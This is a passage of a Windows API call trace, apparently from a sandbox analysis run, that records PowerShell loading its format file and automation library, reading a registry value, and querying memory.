	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.284] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0xf37, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0d18f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d18f*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0317.285] ReadFile (in: hFile=0x330, lpBuffer=0x2e0daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0daf0*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0317.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.286] SetErrorMode (uMode=0x1) returned 0x1
	[0317.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0317.286] SetErrorMode (uMode=0x1) returned 0x1
	[0317.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.286] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x330) returned 0x0
	[0317.286] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0317.286] CoTaskMemAlloc (cb=0x5a) returned 0x31b710
	[0317.286] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x31b710, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0317.286] CoTaskMemFree (pv=0x31b710) 
	[0317.286] RegCloseKey (hKey=0x330) returned 0x0
	[0317.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.290] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xc50fc347, Data2=0xaa8e, Data3=0x405e, Data4=([0]=0x97, [1]=0xf2, [2]=0x1d, [3]=0x46, [4]=0x23, [5]=0xe3, [6]=0xa, [7]=0xd8))) returned 0x0
	[0317.290] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x848260b4, Data2=0x9f45, Data3=0x44b2, Data4=([0]=0x8a, [1]=0xb4, [2]=0x35, [3]=0x9c, [4]=0x28, [5]=0x70, [6]=0xce, [7]=0x36))) returned 0x0
	[0317.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.630] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb5de07b2, Data2=0x77a1, Data3=0x4814, Data4=([0]=0xae, [1]=0xf6, [2]=0x30, [3]=0xbe, [4]=0xd7, [5]=0xad, [6]=0xba, [7]=0xee))) returned 0x0
	[0317.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.634] VirtualQuery (in: lpAddress=0x1cb180, lpBuffer=0x1cc040, dwLength=0x30 | out: lpBuffer=0x1cc040*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.942] VirtualQuery (in: lpAddress=0x1cb210, lpBuffer=0x1cc0d0, dwLength=0x30 | out: lpBuffer=0x1cc0d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.943] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.945] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.947] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.947] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.948] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.949] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
